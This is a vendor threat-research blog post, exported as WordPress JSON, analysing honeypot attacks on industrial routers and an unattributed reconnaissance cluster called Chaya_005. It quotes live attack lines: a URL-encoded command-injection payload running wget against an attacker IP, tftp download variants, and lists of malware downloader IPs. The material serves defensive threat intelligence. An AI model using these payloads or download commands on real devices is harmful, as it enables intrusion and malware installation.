{"id":109984,"date":"2025-12-11T08:00:03","date_gmt":"2025-12-11T13:00:03","guid":{"rendered":"https:\/\/forescoutstage.wpengine.com\/?p=109984"},"modified":"2025-12-10T20:09:53","modified_gmt":"2025-12-11T01:09:53","slug":"ot-network-security-threats-industrial-routers-under-attack","status":"publish","type":"post","link":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/","title":{"rendered":"OT Network Security Threats: Industrial Routers Under Attack"},"content":{"rendered":"<p>In September, the pro-Russian hacktivist group TwoNet <a href=\"https:\/\/www.forescout.com\/blog\/anatomy-of-a-hacktivist-attack-russian-aligned-group-targets-otics\/\">compromised the human-machine interface (HMI)<\/a> of the water treatment honeypot in our <a href=\"https:\/\/www.forescout.com\/research-labs\/threat-intelligence\/\">Adversary Engagement Environment (AEE)<\/a>.<\/p>\n<p>Hacktivists are increasingly compromising and defacing HMIs via manual exploits, but other exposed IoT and OT assets, such as IP cameras, PLCs, and routers are also frequently attacked. How are they targeted? By <a href=\"https:\/\/www.forescout.com\/blog\/targeting-ot-security-ics-threats-malware\/\">automated scanners, botnets, and other malicious activity<\/a>.<\/p>\n<p>Here, we analyze 90 days of activity within our honeypots to show the kind of OT security threats constantly being faced. This helps us better understand the type of devices under attack while capturing unique attack behavior, so asset owners can better mitigate these risks.<\/p>\n<p>The most relevant finding in the analysis period was a cluster we named Chaya_005, which started with a successful exploit against a Sierra Wireless router, but then mixed malformed exploits for other edge devices.<\/p>\n<p>&nbsp;<\/p>\n<h2>Overall Statistics<\/h2>\n<p>For this analysis, we split the AEE assets in three categories:<\/p>\n<ul>\n<li>\u2018<strong>OT Perimeter<\/strong>\u2019 containing four edge devices: three <a href=\"https:\/\/www.forescout.com\/research-labs\/ot-iot-routers-in-the-software-supply-chain\/\">industrial wireless routers<\/a> and an industrial firewall, all from different popular vendors.<\/li>\n<li>\u2018<strong>Exposed OT<\/strong>\u2019 containing four assets that should not be exposed online: three PLCs, and a webserver with the HMI that was defaced by TwoNet.<\/li>\n<li>\u2018<strong>Others<\/strong>\u2019 containing an IP camera, a medical device and an IT VPN router common in small and medium businesses. This category is just used for comparison with the OT assets.<\/li>\n<\/ul>\n<p>Over 90 days, these 11 devices received over 60 million requests flagged by our intrusion detection system (IDS), for an average of eight per second. Across all three categories, this data point immediately stands out: <strong>97% of interactions were SNMP requests<\/strong> and <strong>95% were directed at the firewall<\/strong>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-109995\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/01-Requests-per-Protocol-and-02-Device-graph-combined.jpg\" alt=\"\" width=\"1250\" height=\"506\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/01-Requests-per-Protocol-and-02-Device-graph-combined.jpg 1250w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/01-Requests-per-Protocol-and-02-Device-graph-combined-300x121.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/01-Requests-per-Protocol-and-02-Device-graph-combined-1024x415.jpg 1024w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/01-Requests-per-Protocol-and-02-Device-graph-combined-768x311.jpg 768w\" sizes=\"auto, (max-width: 1250px) 100vw, 1250px\" \/><\/p>\n<p>Out of these, 99.9% were requests to object identifier (OID) 1 \u2013 the root of the entire SNMP OID tree \u2013 or 1.3.6.1 \u2013 the root of the internet subtree. The intention of these scans was likely the basic fingerprinting of devices, but since these are not leaf nodes, the returned content depends on the SNMP agent and it may be an error.<\/p>\n<p>Therefore, we removed SNMP requests for our further analysis which left us with roughly 3.5 million events. These were more evenly distributed per device as follows:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-109996\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/03-Requested-per-Device.jpg\" alt=\"\" width=\"1070\" height=\"716\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/03-Requested-per-Device.jpg 1070w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/03-Requested-per-Device-300x201.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/03-Requested-per-Device-1024x685.jpg 1024w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/03-Requested-per-Device-768x514.jpg 768w\" sizes=\"auto, (max-width: 1070px) 100vw, 1070px\" \/><\/p>\n<p>The firewall still stood out as the most targeted device when counting both total interactions and unique IP addresses. That device was followed by one of the OT routers, the IP camera, and then another OT router.<\/p>\n<p>The figure below shows more clearly that when focusing on OT only (i.e. excluding the \u2018Others\u2019 category), <strong>the OT perimeter captured two thirds of requests versus one third for exposed OT<\/strong>:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-109997\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/04-Requests-per-Asset-Category-graph.jpg\" alt=\"\" width=\"846\" height=\"671\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/04-Requests-per-Asset-Category-graph.jpg 846w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/04-Requests-per-Asset-Category-graph-300x238.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/04-Requests-per-Asset-Category-graph-768x609.jpg 768w\" sizes=\"auto, (max-width: 846px) 100vw, 846px\" \/><\/p>\n<p>Therefore, we focus the rest of the analysis on the events that targeted the edge devices.<\/p>\n<p>&nbsp;<\/p>\n<h2>Attacks on the OT Perimeter<\/h2>\n<p>The events targeting the OT perimeter were distributed per protocol as shown below. SSH and Telnet accounted for 72% of the requests and those were mainly brute force authentication attempts. HTTP and HTTPS accounted for 24%. The \u2018Others\u2019 category accounted for 4% of requests which were generally irrelevant since the devices would not respond to them anyway. This category contains mostly SIP and DNS, followed by a multitude of others, including TFTP, SMB, Modbus, MQTT, and IKE.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-109998\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/05-Requests-per-Protocol-OT-Edge-Devices-graph.jpg\" alt=\"\" width=\"667\" height=\"530\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/05-Requests-per-Protocol-OT-Edge-Devices-graph.jpg 667w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/05-Requests-per-Protocol-OT-Edge-Devices-graph-300x238.jpg 300w\" sizes=\"auto, (max-width: 667px) 100vw, 667px\" \/><\/p>\n<p>For Telnet and SSH connections, the figure below shows the most used credentials (usernames and passwords). All the top 20 credentials are present in a <a href=\"https:\/\/krebsonsecurity.com\/wp-content\/uploads\/2016\/10\/IoTbadpass-Sheet1.pdf\">list of default IoT credentials<\/a> that has been circulating online since 2016 and is shared across many botnets and scanners, except for \u2018service\u2019 which is a generic brute force attempt.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-109999\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/06-Top-Attempted-Credentials-bar-graph.jpg\" alt=\"\" width=\"1108\" height=\"709\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/06-Top-Attempted-Credentials-bar-graph.jpg 1108w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/06-Top-Attempted-Credentials-bar-graph-300x192.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/06-Top-Attempted-Credentials-bar-graph-1024x655.jpg 1024w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/06-Top-Attempted-Credentials-bar-graph-768x491.jpg 768w\" sizes=\"auto, (max-width: 1108px) 100vw, 1108px\" \/><\/p>\n<p>Most of these credentials do not apply to any device in the AEE, although some use default weak combinations, such as root\/admin. <strong>So there is a risk of compromise from automated botnets when using weak passwords \u2013 which has been known for <\/strong><a href=\"https:\/\/www.cisa.gov\/news-events\/ics-alerts\/ics-alert-16-286-01\" target=\"_blank\" rel=\"noopener\"><strong>almost a decade<\/strong><\/a><strong>.<\/strong><\/p>\n<p>Things start to get more interesting when we look into HTTP requests. The vast majority of POST and GET requests were either benign indexing (such as \u201c<code>\/<\/code>\u201d or \u201c<code>\/robots.txt<\/code>\u201d ) or potentially malicious attempts to scan device webservers for specific files, such as \u201c<code>\/php\/login.php<\/code>\u201d. But among these requests, there were almost 3,000 that we could map to attempted vulnerability exploitations used to contact external servers, typically to download malware into a device.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110000\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/07-HTTP-requests-per-method-graph.jpg\" alt=\"\" width=\"709\" height=\"647\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/07-HTTP-requests-per-method-graph.jpg 709w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/07-HTTP-requests-per-method-graph-300x274.jpg 300w\" sizes=\"auto, (max-width: 709px) 100vw, 709px\" \/><\/p>\n<p>Once again, most of those requests would not be valid for the devices in the AEE, as they were automatically attempted by botnets against potentially any IP address without prior fingerprinting. The most relevant attempted exploitations in this category were against the following CVEs:<\/p>\n<ul>\n<li>CVE-2024-12856 against Four-Faith industrial routers, not a device that was part of this analysis.<\/li>\n<li>CVE-2024-0012, CVE-2024-9474 and CVE-2025-0108 against several versions of PAN OS, but not the version running on the AEE firewall.<\/li>\n<\/ul>\n<p>The 3,000 malicious requests were distributed per malware family as follows:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110001\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/08-Most-Common-Malware.jpg\" alt=\"\" width=\"860\" height=\"625\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/08-Most-Common-Malware.jpg 860w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/08-Most-Common-Malware-300x218.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/08-Most-Common-Malware-768x558.jpg 768w\" sizes=\"auto, (max-width: 860px) 100vw, 860px\" \/><\/p>\n<p>Aside from the <a href=\"https:\/\/www.forescout.com\/blog\/new-redtail-malware-exploited-via-php-security-vulnerability\/\">Redtail cryptominer<\/a> and the Chaya_005 cluster (which we will detail below and could not map to known activity), all others are DDoS or proxy botnets. Two are particularly noteworthy:<\/p>\n<ul>\n<li><strong>RondoDox<\/strong> is a relatively new botnet first spotted around May. It has been <a href=\"https:\/\/www.darkreading.com\/endpoint-security\/rondodox-botnet-exploit-edge-vulns\" target=\"_blank\" rel=\"noopener\">quickly adding new exploits to its arsenal<\/a>. It now counts over 50 vulnerabilities on IoT devices. Several have no assigned CVE identifiers. This \u2018shotgun\u2019 approach to exploitation seems to be working: it was the most active botnet we noticed in these 90 days by far. <strong>If the botnet adds known vulnerabilities for industrial edge devices, this could become risky for asset owners very quickly.<\/strong><\/li>\n<li><strong>ShadowV2<\/strong> is even newer. It was first spotted in June and is already the third most common botnet in our analysis. The same risk considerations apply for asset owners despite targeting mostly D-Link and TP-Link routers. This botnet hasn\u2019t been adding as many exploits as RondoDox.<\/li>\n<\/ul>\n<p>These malware have a common way of infection: they exploit HTTP vulnerabilities, such as command injections and path traversals to execute a command that will reach a server and download a binary to be executed on the infected device. That binary will then try to infect other devices and continue the cycle. The IP addresses observed as downloaders in this 90-day period are reported in the IoC section.<\/p>\n<p>&nbsp;<\/p>\n<h2>Chaya_005: Fingerprinting Vulnerable Edge Devices<\/h2>\n<p>Following our <a href=\"https:\/\/www.forescout.com\/blog\/ics-threat-analysis-new-experimental-malware-can-kill-engineering-processes\/\">naming convention<\/a> for activity clusters that are not attributed to any known threat actor or region, we decided to name a relevant cluster of requests as Chaya_005.<\/p>\n<p>Chaya_005 originally consisted of 70 HTTP POST requests between October 22 and December 3, 2025, all originating from IP address <code>31.57.243.170<\/code> and all directed at \u201c<code>\/xml\/Connect.xml<\/code>\u201d. This URL is a valid endpoint on the router that was being targeted (a Sierra Wireless LS300 which reached end-of-support in December 2021).<\/p>\n<p>Although the target and endpoint were a valid combination, the exploit was incorrectly using several variations of: \u201c<code>action=login&amp;kPath=&lt;payload&gt;&amp;loginUser=admin&amp;loginPwd=pass<\/code>\u201d. The closest thing we could find for this request was an <a href=\"https:\/\/www.exploit-db.com\/exploits\/48268\" target=\"_blank\" rel=\"noopener\">exploit for CVE-2020-8515<\/a> affecting DrayTek routers. However, the vulnerable parameter should be \u201c<code>keyPath<\/code>\u201d instead of \u201c<code>kPath<\/code>\u201d. Even with the correct parameter, this would not work against the Sierra Wireless router.<\/p>\n<p>Even if the exploit was incorrect, the payloads were interesting. There were several \u00a0versions of: <code>%27%0Awget%20http%3A\/\/31.57.243.170\/SW068F8861C11312F%0A%27<\/code> where instead of wget, the attackers tried tftp, ftpget, curl, and other utilities. All variations did the same: attempt to contact the server on <code>31.57.243.170<\/code> using either HTTP or FTP.<\/p>\n<p>&nbsp;<\/p>\n<h2>Payload Analysis<\/h2>\n<p>All payload versions carried a signature resembling the one shown above: <code>SW068F8861C11312F<\/code>. It is common for botnets to use seemingly random names for the files downloaded from a server, so that was our first assumption. However, we could never download any file on that server.<\/p>\n<p>These signatures had more distinctive patterns than required for a filename. By analyzing the 70 originally available examples and others obtained from the pivoting we will describe below, we found the following patterns:<\/p>\n<ul>\n<li>The first character can be either S or B. This informs the attacker whether the command has been run directly in the shell (S) or via busybox (B).<\/li>\n<li>The second character can be either T, F, C, or W depending on the utility: (T)ftp, (F)tpget, (C)url, or (W)get, respectively.<\/li>\n<li>The third character can be either 0, 1, or 2. They are valid only for tftp and indicate a command configuration:\n<ul>\n<li>ST0 corresponds to \u201c<code>tftp 31.57.243.170 -c get &lt;signature&gt;<\/code>\u201d<\/li>\n<li>ST1 corresponds to \u201c<code>tftp -r &lt;signature&gt; -g 31.57.243.170<\/code>\u201d<\/li>\n<li>ST2 corresponds to \u201c<code>echo get 31.57.243.170:&lt;signature&gt; | tftp<\/code>\u201d<\/li>\n<\/ul>\n<\/li>\n<li>The next eight characters are a hex representation of the timestamp for the request. For instance, in <code>ST167913F7A1362D2<\/code>, the hexadecimal characters \u201c<code>67913F7A<\/code>\u201d represent \u201c<code>1737572218<\/code>\u201d in decimal, which corresponds to Wednesday, January 22, 2025, 6:56:58 PM GMT in UNIX epoch.<\/li>\n<li>We could not fully decode the last six characters. They may be a random number to identify the session. We saw identical signatures coming from the same IP address, at the same time, against the same device, whose only difference were the attacked port (9443 vs 9119). A few days later, the same attack patterns whose only difference was time resulted in a different signature.<\/li>\n<\/ul>\n<p>During the scans, the IP address <code>31.57.243.170<\/code> was running a vsFTPd 3.0.3 server on port 21 and an unspecified HTTP server on port 80. The HTTP server returned error 404 (\u201cnot found\u201d) even for the root path.<\/p>\n<p>Based on the characteristics of the payload signature and the server, we believe these requests were used to probe the capabilities available in target systems. If a request was successful \u2013 meaning the device was vulnerable \u2013 the attacker would have an entry in their HTTP\/FTP logs informing them which system was vulnerable to a specific kind of attack execution, and would identify when the test worked.<\/p>\n<p>This kind of capability is not typical DDoS botnet behavior, but it may be useful to maintain an inventory of devices that can later be exploited for a particular reason, such as to download a botnet, cryptominer, residential proxy, or other malicious software to the target.<\/p>\n<p>&nbsp;<\/p>\n<h2>Pivoting on the Payload<\/h2>\n<p>When we searched for similar payload signatures within previous timeframes, we saw that the type of request associated to Chaya_005 has been happening for at least two years \u2013 with the same behavior initiated from several other IP addresses \u2013 targeting different endpoints of multiple devices, not limited to Sierra Wireless. This figure summarizes these other clusters:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110002\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/08\/09-Payload-Diagram-V2.jpg\" alt=\"\" width=\"2094\" height=\"861\" \/><\/p>\n<p>We kept clusters 1-5 under the Chaya_005 umbrella because of the unique payload signatures, rather than because of device targeting or specific CVEs.<\/p>\n<p>Although most IP addresses used in clusters 1-4 were no longer active, it was interesting to see that the IP address used in cluster 5 had previously been used for cluster 2 (almost a year before). The IP address of cluster 4 (<code>79.141.172.211<\/code>) still had an almost identical configuration as the IP address of cluster 5 at the end of November, shown in the figures below.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110009\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10a-ip-addresses.jpg\" alt=\"\" width=\"1381\" height=\"1167\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10a-ip-addresses.jpg 1381w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10a-ip-addresses-300x254.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10a-ip-addresses-1024x865.jpg 1024w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10a-ip-addresses-768x649.jpg 768w\" sizes=\"auto, (max-width: 1381px) 100vw, 1381px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110010\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses.jpg\" alt=\"\" width=\"1570\" height=\"1150\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses.jpg 1570w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses-300x220.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses-1024x750.jpg 1024w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses-768x563.jpg 768w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses-1536x1125.jpg 1536w\" sizes=\"auto, (max-width: 1570px) 100vw, 1570px\" \/><\/p>\n<p>Only on the first cluster, the attackers were successful with an exploit. At that time, they used payloads to exploit CVE-2018-4063 on our Sierra Wireless router, as shown in this figure.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110004\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-11-exploit-payloads.jpg\" alt=\"\" width=\"903\" height=\"377\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-11-exploit-payloads.jpg 903w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-11-exploit-payloads-300x125.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-11-exploit-payloads-768x321.jpg 768w\" sizes=\"auto, (max-width: 903px) 100vw, 903px\" \/><\/p>\n<p>This first cluster may have been a manual exploitation attempt because the attacker rotated three different IP addresses in the first nine days. This is the only instance where the exploit is well-formed and targets the correct device. In all other clusters, there were attempts against endpoints of other edge devices (DrayTek and Cisco IOS XE) with exploit payloads that did not match the actual target.<\/p>\n<p>We also searched for similar payload signatures on public repositories and found at least two instances submitted to VirusTotal. This means our honeypot was not the only target:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.virustotal.com\/gui\/url\/1375b9907f3ab408582d3c8893649bc86b8edd5803df8e937e319372db159e7a\" target=\"_blank\" rel=\"noopener\">https:\/\/www.virustotal.com\/gui\/url\/1375b9907f3ab408582d3c8893649bc86b8edd5803df8e937e319372db159e7a<\/a> &#8211; <code>http:\/\/31.57.243[.]170\/BC067EFEB001FA990<\/code> submitted from Israel on April 10, 2025 although the timestamp \u201c<code>67EFEB00<\/code>\u201d corresponds to April 4, 2025<\/li>\n<li><a href=\"https:\/\/www.virustotal.com\/gui\/url\/f43874dfff0ae0dcaf73f6393d4ea52464aff8030e6d3289dcac46d7e40664bc\/telemetry\" target=\"_blank\" rel=\"noopener\">https:\/\/www.virustotal.com\/gui\/url\/f43874dfff0ae0dcaf73f6393d4ea52464aff8030e6d3289dcac46d7e40664bc\/telemetry<\/a> &#8211; <code>http:\/\/51.210.138[.]92\/SW065DF14194C4223<\/code> submitted from Poland on March 4, 2024 although the timestamp \u201c<code>65DF1419<\/code>\u201d corresponds to February 28, 2024<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h2>Summary Assessment<\/h2>\n<p>We cannot precisely identify what is behind Chaya_005. It could even be \u2018non-malicious\u2019 scans from researchers or a legitimate company, although that is unlikely. The real exploits would be unethical at minimum.<\/p>\n<p>Chaya_005 appears to be a broader reconnaissance campaign testing multiple vendor vulnerabilities rather than focusing on a single one. So far, we only observed successful exploitation in cluster 1 for Sierra Wireless CVE-2018-4063. Even so, there are a few characteristics that made Chaya_005 stand out to us:<\/p>\n<ul>\n<li>The attempted exploits mix activity seen in other botnets (e.g., CVE-2020-8515 on Draytek) and activity not previously associated with known malware (e.g., CVE-2018-4063).<\/li>\n<li>We never saw any file stored or downloaded on the contacted servers.<\/li>\n<li>We never saw port scan activity from the IP addresses used in Chaya_005. This indicates that the attackers preemptively built a list of potential candidates either from a separate scanning infrastructure or from public repositories like Shodan.<\/li>\n<li>We never saw subsequent activity or attempts to exploit different devices. This indicates that the activity originates from scanning infrastructure focused exclusively on edge devices, despite the singular behavior of using malformed exploits for the most part.<\/li>\n<li>The IP address active in October-December 2025 (<code>31.57.243.170<\/code>) had been used for the same scans almost a year before which is not typical for a botnet infection.<\/li>\n<li>The IP addresses used in the attacks did not seem to be infected by botnets when targeting our systems. We did not see unrelated requests on our honeypots and could not find third-party threat intelligence indicating that they were targeting others.<\/li>\n<li>The closest potentially related activity we could find was from the <a href=\"https:\/\/www.trendmicro.com\/en\/research\/24\/k\/water-barghest.html\" target=\"_blank\" rel=\"noopener\">Water Barghest<\/a> intrusion set:\n<ul>\n<li>IP address <code>51.210.138.92<\/code> was part of Chaya_005 cluster 1 on Jan 8 and Jan 29, 2024 and hit a target in Poland on February 28, 2024. In between these two activities, on February 1, the same IP address was serving <a href=\"https:\/\/www.virustotal.com\/gui\/file\/892eb161254733cf5923313544e923fface375c27b3dcf8f66e79da84c93cf65\" target=\"_blank\" rel=\"noopener\">a file<\/a> on <code>http:\/\/51.210.138[.]92\/QSAE<\/code>. This file (also seen with several other four-letter names such as BHLS, MYFM and DPBW) is the Ngioweb botnet associated with Water Barghest.<\/li>\n<li>IP address <code>185.45.195.12<\/code> is in the same subnet as <code>45.195.14<\/code> that was part of Chaya_005 cluster 3 between December 16, 2024 and January 20, 2025. The address ending in 12 was seen serving the same <code>Ngioweb<\/code> file on November 11, 2023 (a year prior to the Chaya_005 activity). Although the IP addresses are \u201cclose\u201d the time difference makes this point less relevant than the first one.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>We do not believe that Chaya_005 is currently a significant threat because we have not seen evidence of successful exploitation after cluster 1. Since Sierra Wireless routers are very popular and can <a href=\"https:\/\/www.shodan.io\/search?query=ssl%3A%22sierra+wireless%22\" target=\"_blank\" rel=\"noopener\">still often be found with HTTP management interfaces online<\/a>, it is important for asset owners to pay attention.<\/p>\n<p>While legacy devices may remain vulnerable, the combination of available patches, product obsolescence, and network retirement contextualizes the actual threat landscape:<\/p>\n<ul>\n<li>CVE-2018-4063 is a six-year-old patched vulnerability in an end-of-support product<\/li>\n<li>As a 3G-only device, LS300 connectivity is limited by carrier network sunsets (completed in North America 2022, progressing globally), which will reduce the population of remotely exploitable devices<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h2>Conclusion and Mitigation Recommendations<\/h2>\n<p>The key takeaway from this research is that OT perimeter devices receive more attention from automated attacks than the unintentionally exposed OT. Although most activity on those devices is either not malicious or not successful exploitation, there are risks: \u00a0weak credentials, specific exploits being added to botnets, and malicious infrastructure used for probing specific devices.<\/p>\n<p>Another important takeaway is that automated threats do not differentiate between IT and OT devices. Even on OT devices, there were several brute force and exploitation attempts using IT credentials or vulnerabilities. Similarly, in the past we have <a href=\"https:\/\/www.forescout.com\/blog\/targeting-ot-security-ics-threats-malware\/\">reported IoT botnets that packed OT-specific credentials<\/a>.<\/p>\n<p>Rather than looking at these events as meaningless or ineffective attacks, it\u2019s important for asset owners to think about the increasing connectivity and different types of devices in their networks.<\/p>\n<p>Consider the <a href=\"https:\/\/sektorcert.dk\/wp-content\/uploads\/2023\/11\/SektorCERT-The-attack-against-Danish-critical-infrastructure-TLP-CLEAR.pdf\" target=\"_blank\" rel=\"noopener\">Mirai botnet infections in the Danish power sector<\/a> that led to companies going into island mode: those started from \u2018IT\u2019 Zyxel firewalls used in the OT perimeter. When we analyzed those events in early 2024, we noticed a similar pattern throughout critical infrastructure, especially in Europe. Considering threats \u2018IT-only\u2019 or \u2018OT-only\u2019 can be dangerous. Securing both IT and OT together is fundamental.[<\/p>\n<p>To safeguard OT environments, we recommend the following measures:<\/p>\n<ul>\n<li><strong>Harden OT Devices<\/strong><strong>. <\/strong>Identify all devices connected to your network, assess their open ports and credentials, and ensure that default or easily guessable credentials are changed. Disable any unused services to minimize attack surface.<\/li>\n<li><strong>Segment the Network. <\/strong>Avoid directly exposing OT devices to the internet. Properly segment networks to isolate IT, IoT and OT devices limiting network connections to only authorized management and engineering workstations or among unmanaged devices that need to communicate.<\/li>\n<li><strong>Monitor for Threats. <\/strong>Implement IoT\/OT-aware monitoring solutions that can detect malicious indicators and behaviors. This includes flagging the use of blacklisted credentials and unauthorized OT protocol activity within your network.<\/li>\n<\/ul>\n<h3>IoCs<\/h3>\n<p>Indicators of Compromise (IoCs) including IP addresses and others not listed here for brevity, such as file hashes, are available on the <a href=\"https:\/\/forescout.vederelabs.com\/register\" target=\"_blank\" rel=\"noopener\">Forescout Research \u2013 Vedere Labs threat feed<\/a>.<\/p>\n<ul>\n<li>Chaya_005:\n<ul>\n<li><code>103.106.66.206<\/code><\/li>\n<li><code>172.86.88.88<\/code><\/li>\n<li><code>185.45.195.14<\/code><\/li>\n<li><code>206.206.123.95<\/code><\/li>\n<li><code>23.95.235.22<\/code><\/li>\n<li><code>31.57.243.170<\/code><\/li>\n<li><code>5.181.3.24<\/code><\/li>\n<li><code>51.210.138.92<\/code><\/li>\n<li><code>79.141.172.211<\/code><\/li>\n<li><code>89.185.80.110<\/code><\/li>\n<\/ul>\n<\/li>\n<li>Mozi downloader IPs:\n<ul>\n<li><code>103.158.171.55<\/code><\/li>\n<li><code>103.168.3.215<\/code><\/li>\n<li><code>110.39.231.50<\/code><\/li>\n<li><code>115.49.200.151<\/code><\/li>\n<li><code>117.206.100.73<\/code><\/li>\n<li><code>180.191.255.106<\/code><\/li>\n<li><code>192.21.165.83<\/code><\/li>\n<li><code>217.65.221.197<\/code><\/li>\n<li><code>45.230.66.110<\/code><\/li>\n<li><code>45.230.66.113<\/code><\/li>\n<li><code>45.230.66.117<\/code><\/li>\n<li><code>45.230.66.125<\/code><\/li>\n<li><code>61.52.3.135<\/code><\/li>\n<li><code>66.167.169.156<\/code><\/li>\n<\/ul>\n<\/li>\n<li>Mirai downloader IPs:\n<ul>\n<li><code>23.177.185.39<\/code><\/li>\n<li><code>103.77.241.50<\/code><\/li>\n<li><code>196.251.86.86<\/code><\/li>\n<li><code>196.251.87.194<\/code><\/li>\n<li><code>213.209.143.37<\/code><\/li>\n<li><code>26.249.145.103<\/code><\/li>\n<li><code>91.231.222.192<\/code><\/li>\n<li><code>94.154.35.154<\/code><\/li>\n<\/ul>\n<\/li>\n<li>Redtail downloader IPs:\n<ul>\n<li><code>178.16.55.224<\/code><\/li>\n<\/ul>\n<\/li>\n<li>V3G4 downloader IPs:\n<ul>\n<li><code>64.225.49.218<\/code><\/li>\n<\/ul>\n<\/li>\n<li>RondoDox downloader IPs:\n<ul>\n<li><code>74.194.191.52<\/code><\/li>\n<\/ul>\n<\/li>\n<li>ShadowV2 downloader IPs:\n<ul>\n<li><code>81.88.18.108<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Industrial routers face escalating botnet attacks. Our honeypot analysis reveals emerging OT network security threats targeting edge devices.<\/p>\n","protected":false},"author":124,"featured_media":109986,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"ep_exclude_from_search":false,"footnotes":"","_links_to":"","_links_to_target":""},"categories":[540],"tags":[],"coauthors":[542],"class_list":["post-109984","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research-and-cyber-alerts"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>OT Network Security Threats: Industrial Routers Under Attack<\/title>\n<meta name=\"description\" content=\"Industrial routers face escalating botnet attacks. Our honeypot analysis reveals emerging OT network security threats targeting edge devices.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"OT Network Security Threats: Industrial Routers Under Attack\" \/>\n<meta property=\"og:description\" content=\"Industrial routers face escalating botnet attacks. Our honeypot analysis reveals emerging OT network security threats targeting edge devices.\" \/>\n<meta 